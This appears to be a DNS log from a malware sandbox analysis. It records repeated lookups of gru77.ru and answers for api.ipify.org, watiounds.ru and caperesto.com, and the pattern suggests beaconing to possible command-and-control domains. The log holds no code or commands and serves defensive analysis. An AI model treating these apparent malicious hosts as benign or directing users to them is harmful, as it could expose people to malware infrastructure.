                                          Apr 29, 2021 08:18:37.417042017 CEST192.168.2.228.8.8.80x1b7fStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:39.750850916 CEST192.168.2.228.8.8.80x5b6aStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:40.755887032 CEST192.168.2.228.8.8.80x5b6aStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:41.773745060 CEST192.168.2.228.8.8.80x5b6aStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:43.782186031 CEST192.168.2.228.8.8.80x5b6aStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:47.607588053 CEST192.168.2.228.8.8.80x5490Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:48.618860960 CEST192.168.2.228.8.8.80x5490Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:49.632738113 CEST192.168.2.228.8.8.80x5490Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:51.645442009 CEST192.168.2.228.8.8.80x5490Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:54.960975885 CEST192.168.2.228.8.8.80x2c87Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:55.966974020 CEST192.168.2.228.8.8.80x2c87Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:56.981061935 CEST192.168.2.228.8.8.80x2c87Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:58.993891954 CEST192.168.2.228.8.8.80x2c87Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:02.816595078 CEST192.168.2.228.8.8.80xfe80Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:03.829915047 CEST192.168.2.228.8.8.80xfe80Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:04.844069958 CEST192.168.2.228.8.8.80xfe80Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:06.856813908 CEST192.168.2.228.8.8.80xfe80Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:10.181422949 CEST192.168.2.228.8.8.80x2b1bStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:11.193661928 CEST192.168.2.228.8.8.80x2b1bStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:12.208159924 CEST192.168.2.228.8.8.80x2b1bStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:14.220547915 CEST192.168.2.228.8.8.80x2b1bStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:18.022157907 CEST192.168.2.228.8.8.80xd4abStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:19.025893927 CEST192.168.2.228.8.8.80xd4abStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:20.040262938 CEST192.168.2.228.8.8.80xd4abStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:22.052923918 CEST192.168.2.228.8.8.80xd4abStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:25.372905970 CEST192.168.2.228.8.8.80x5e91Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:26.374020100 CEST192.168.2.228.8.8.80x5e91Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:27.388202906 CEST192.168.2.228.8.8.80x5e91Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:29.400366068 CEST192.168.2.228.8.8.80x5e91Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:32.335165977 CEST192.168.2.228.8.8.80x2063Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:33.348094940 CEST192.168.2.228.8.8.80x2063Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:34.362051010 CEST192.168.2.228.8.8.80x2063Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:36.374481916 CEST192.168.2.228.8.8.80x2063Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:39.690820932 CEST192.168.2.228.8.8.80x52f3Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:40.695997953 CEST192.168.2.228.8.8.80x52f3Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:41.710190058 CEST192.168.2.228.8.8.80x52f3Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:43.722770929 CEST192.168.2.228.8.8.80x52f3Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:47.622308016 CEST192.168.2.228.8.8.80x8f38Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:48.621468067 CEST192.168.2.228.8.8.80x8f38Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:49.635816097 CEST192.168.2.228.8.8.80x8f38Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:51.648148060 CEST192.168.2.228.8.8.80x8f38Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:54.973160028 CEST192.168.2.228.8.8.80x427bStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:55.985600948 CEST192.168.2.228.8.8.80x427bStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:56.999859095 CEST192.168.2.228.8.8.80x427bStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:19:59.012151003 CEST192.168.2.228.8.8.80x427bStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:02.825726986 CEST192.168.2.228.8.8.80xbfaStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:03.832724094 CEST192.168.2.228.8.8.80xbfaStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:04.847202063 CEST192.168.2.228.8.8.80xbfaStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:06.859677076 CEST192.168.2.228.8.8.80xbfaStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:10.184326887 CEST192.168.2.228.8.8.80x3e7Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:11.196929932 CEST192.168.2.228.8.8.80x3e7Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:12.210927963 CEST192.168.2.228.8.8.80x3e7Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:14.223584890 CEST192.168.2.228.8.8.80x3e7Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:18.008296013 CEST192.168.2.228.8.8.80xf460Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:19.013288975 CEST192.168.2.228.8.8.80xf460Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:20.027174950 CEST192.168.2.228.8.8.80xf460Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:22.039700985 CEST192.168.2.228.8.8.80xf460Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:25.364985943 CEST192.168.2.228.8.8.80x29b4Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:26.377291918 CEST192.168.2.228.8.8.80x29b4Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:27.391290903 CEST192.168.2.228.8.8.80x29b4Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:29.403788090 CEST192.168.2.228.8.8.80x29b4Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:33.228070974 CEST192.168.2.228.8.8.80xaf1Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:34.240520954 CEST192.168.2.228.8.8.80xaf1Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:35.254304886 CEST192.168.2.228.8.8.80xaf1Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:37.266899109 CEST192.168.2.228.8.8.80xaf1Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:40.588052034 CEST192.168.2.228.8.8.80x9014Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:41.588229895 CEST192.168.2.228.8.8.80x9014Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:42.602658987 CEST192.168.2.228.8.8.80x9014Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:44.614748955 CEST192.168.2.228.8.8.80x9014Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:48.421766043 CEST192.168.2.228.8.8.80xb4e1Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:49.435831070 CEST192.168.2.228.8.8.80xb4e1Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:50.449642897 CEST192.168.2.228.8.8.80xb4e1Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:52.462131977 CEST192.168.2.228.8.8.80xb4e1Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:55.773310900 CEST192.168.2.228.8.8.80xbf8bStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:56.783790112 CEST192.168.2.228.8.8.80xbf8bStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:57.797938108 CEST192.168.2.228.8.8.80xbf8bStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:20:59.810934067 CEST192.168.2.228.8.8.80xbf8bStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:03.630489111 CEST192.168.2.228.8.8.80x3420Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:04.631581068 CEST192.168.2.228.8.8.80x3420Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:05.645612955 CEST192.168.2.228.8.8.80x3420Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:07.658106089 CEST192.168.2.228.8.8.80x3420Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:10.992656946 CEST192.168.2.228.8.8.80x48d4Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:11.995584965 CEST192.168.2.228.8.8.80x48d4Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:13.009659052 CEST192.168.2.228.8.8.80x48d4Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:15.021749020 CEST192.168.2.228.8.8.80x48d4Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:18.852174044 CEST192.168.2.228.8.8.80x8d9fStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:19.858361959 CEST192.168.2.228.8.8.80x8d9fStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:20.872631073 CEST192.168.2.228.8.8.80x8d9fStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:22.885135889 CEST192.168.2.228.8.8.80x8d9fStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:25.241588116 CEST192.168.2.228.8.8.80x3ca1Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:26.255305052 CEST192.168.2.228.8.8.80x3ca1Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:27.269269943 CEST192.168.2.228.8.8.80x3ca1Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:21:29.281857967 CEST192.168.2.228.8.8.80x3ca1Standard query (0)gru77.ruA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Apr 29, 2021 08:16:08.412482023 CEST8.8.8.8192.168.2.220xb163No error (0)api.ipify.orgnagano-19599.herokussl.comCNAME (Canonical name)IN (0x0001)
                                          Apr 29, 2021 08:16:08.412482023 CEST8.8.8.8192.168.2.220xb163No error (0)nagano-19599.herokussl.comelb097307-934924932.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                          Apr 29, 2021 08:16:08.412482023 CEST8.8.8.8192.168.2.220xb163No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com107.22.233.72A (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:08.412482023 CEST8.8.8.8192.168.2.220xb163No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.16.249.42A (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:08.412482023 CEST8.8.8.8192.168.2.220xb163No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.19.216.111A (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:08.412482023 CEST8.8.8.8192.168.2.220xb163No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.165.85A (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:08.412482023 CEST8.8.8.8192.168.2.220xb163No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.19.252.36A (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:08.412482023 CEST8.8.8.8192.168.2.220xb163No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.175.90A (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:08.412482023 CEST8.8.8.8192.168.2.220xb163No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.252.4A (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:08.412482023 CEST8.8.8.8192.168.2.220xb163No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.76.253A (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:08.462325096 CEST8.8.8.8192.168.2.220xb163No error (0)api.ipify.orgnagano-19599.herokussl.comCNAME (Canonical name)IN (0x0001)
                                          Apr 29, 2021 08:16:08.462325096 CEST8.8.8.8192.168.2.220xb163No error (0)nagano-19599.herokussl.comelb097307-934924932.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                          Apr 29, 2021 08:16:08.462325096 CEST8.8.8.8192.168.2.220xb163No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.16.249.42A (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:08.462325096 CEST8.8.8.8192.168.2.220xb163No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.157.230A (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:08.462325096 CEST8.8.8.8192.168.2.220xb163No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.19.242.215A (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:08.462325096 CEST8.8.8.8192.168.2.220xb163No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.83.248A (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:08.462325096 CEST8.8.8.8192.168.2.220xb163No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.169.203A (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:08.462325096 CEST8.8.8.8192.168.2.220xb163No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.19.216.111A (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:08.462325096 CEST8.8.8.8192.168.2.220xb163No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.252.4A (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:08.462325096 CEST8.8.8.8192.168.2.220xb163No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.243.121.36A (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:12.306212902 CEST8.8.8.8192.168.2.220x82b3Server failure (2)caperesto.comnonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:14.727392912 CEST8.8.8.8192.168.2.220x71ddNo error (0)watiounds.ru95.47.161.162A (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:14.954421997 CEST8.8.8.8192.168.2.220x82b3Server failure (2)caperesto.comnonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:15.001725912 CEST8.8.8.8192.168.2.220x82b3Server failure (2)caperesto.comnonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:20.033402920 CEST8.8.8.8192.168.2.220xfc39Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:21.039962053 CEST8.8.8.8192.168.2.220xfc39Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:22.054261923 CEST8.8.8.8192.168.2.220xfc39Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:24.065943956 CEST8.8.8.8192.168.2.220xfc39Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:27.394233942 CEST8.8.8.8192.168.2.220x9175Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:28.406646967 CEST8.8.8.8192.168.2.220x9175Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:29.420356035 CEST8.8.8.8192.168.2.220x9175Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:31.433557987 CEST8.8.8.8192.168.2.220x9175Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:35.104605913 CEST8.8.8.8192.168.2.220xc6ccServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:36.708574057 CEST8.8.8.8192.168.2.220xc6ccServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:37.733925104 CEST8.8.8.8192.168.2.220xc6ccServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:39.745958090 CEST8.8.8.8192.168.2.220xc6ccServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:42.461020947 CEST8.8.8.8192.168.2.220xd92dServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:42.494695902 CEST8.8.8.8192.168.2.220xd92dServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:44.488445044 CEST8.8.8.8192.168.2.220xd92dServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:45.523480892 CEST8.8.8.8192.168.2.220xd92dServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:50.331748009 CEST8.8.8.8192.168.2.220x2cServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:51.340188026 CEST8.8.8.8192.168.2.220x2cServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:52.352313042 CEST8.8.8.8192.168.2.220x2cServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:54.363843918 CEST8.8.8.8192.168.2.220x2cServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:59.238643885 CEST8.8.8.8192.168.2.220xda3eServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:00.207040071 CEST8.8.8.8192.168.2.220xda3eServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:02.152870893 CEST8.8.8.8192.168.2.220xda3eServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:04.164755106 CEST8.8.8.8192.168.2.220xda3eServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:07.101130009 CEST8.8.8.8192.168.2.220x21e1Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:08.109038115 CEST8.8.8.8192.168.2.220x21e1Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:09.123047113 CEST8.8.8.8192.168.2.220x21e1Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:11.160070896 CEST8.8.8.8192.168.2.220x21e1Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:14.460660934 CEST8.8.8.8192.168.2.220x6365Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:15.460308075 CEST8.8.8.8192.168.2.220x6365Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:16.474087000 CEST8.8.8.8192.168.2.220x6365Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:18.486964941 CEST8.8.8.8192.168.2.220x6365Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:22.323371887 CEST8.8.8.8192.168.2.220x868Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:23.323084116 CEST8.8.8.8192.168.2.220x868Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:24.339030981 CEST8.8.8.8192.168.2.220x868Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:26.349823952 CEST8.8.8.8192.168.2.220x868Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:29.679543972 CEST8.8.8.8192.168.2.220x3fe2Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:29.713330030 CEST8.8.8.8192.168.2.220x3fe2Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:31.703680038 CEST8.8.8.8192.168.2.220x3fe2Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:32.832165956 CEST8.8.8.8192.168.2.220x3fe2Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:37.549154043 CEST8.8.8.8192.168.2.220x77b3Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:38.563119888 CEST8.8.8.8192.168.2.220x77b3Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:39.576813936 CEST8.8.8.8192.168.2.220x77b3Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:41.589626074 CEST8.8.8.8192.168.2.220x77b3Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:44.919480085 CEST8.8.8.8192.168.2.220x91e8Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:44.951870918 CEST8.8.8.8192.168.2.220x91e8Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:46.943453074 CEST8.8.8.8192.168.2.220x91e8Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:48.959616899 CEST8.8.8.8192.168.2.220x91e8Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:52.799541950 CEST8.8.8.8192.168.2.220x76deServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:53.805877924 CEST8.8.8.8192.168.2.220x76deServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:54.820394993 CEST8.8.8.8192.168.2.220x76deServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:56.831685066 CEST8.8.8.8192.168.2.220x76deServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:00.148974895 CEST8.8.8.8192.168.2.220xc63dServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:00.213671923 CEST8.8.8.8192.168.2.220xc63dServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:02.167762995 CEST8.8.8.8192.168.2.220xc63dServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:04.180115938 CEST8.8.8.8192.168.2.220xc63dServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:08.002758980 CEST8.8.8.8192.168.2.220xe31eServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:09.003921032 CEST8.8.8.8192.168.2.220xe31eServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:10.018265009 CEST8.8.8.8192.168.2.220xe31eServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:12.031404972 CEST8.8.8.8192.168.2.220xe31eServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:15.363049030 CEST8.8.8.8192.168.2.220x5877Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:16.364726067 CEST8.8.8.8192.168.2.220x5877Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:17.380562067 CEST8.8.8.8192.168.2.220x5877Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:19.392508984 CEST8.8.8.8192.168.2.220x5877Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:23.209110022 CEST8.8.8.8192.168.2.220xece2Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:24.215069056 CEST8.8.8.8192.168.2.220xece2Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:25.229593992 CEST8.8.8.8192.168.2.220xece2Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:27.242328882 CEST8.8.8.8192.168.2.220xece2Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:30.566313028 CEST8.8.8.8192.168.2.220x1692Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:31.576910973 CEST8.8.8.8192.168.2.220x1692Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:31.652856112 CEST8.8.8.8192.168.2.220x1692Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:34.603182077 CEST8.8.8.8192.168.2.220x1692Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:37.446479082 CEST8.8.8.8192.168.2.220x1b7fServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:38.471015930 CEST8.8.8.8192.168.2.220x1b7fServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:40.453818083 CEST8.8.8.8192.168.2.220x1b7fServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:42.466054916 CEST8.8.8.8192.168.2.220x1b7fServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:44.800219059 CEST8.8.8.8192.168.2.220x5b6aServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:45.805493116 CEST8.8.8.8192.168.2.220x5b6aServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:46.822938919 CEST8.8.8.8192.168.2.220x5b6aServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:47.857362032 CEST8.8.8.8192.168.2.220x5b6aServer failure (2)gru77.runonenoneA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:52.659811974 CEST8.8.8.8192.168.2.220x5490Server failure (2)gru77.runonenoneA (IP address)IN (0x0001)
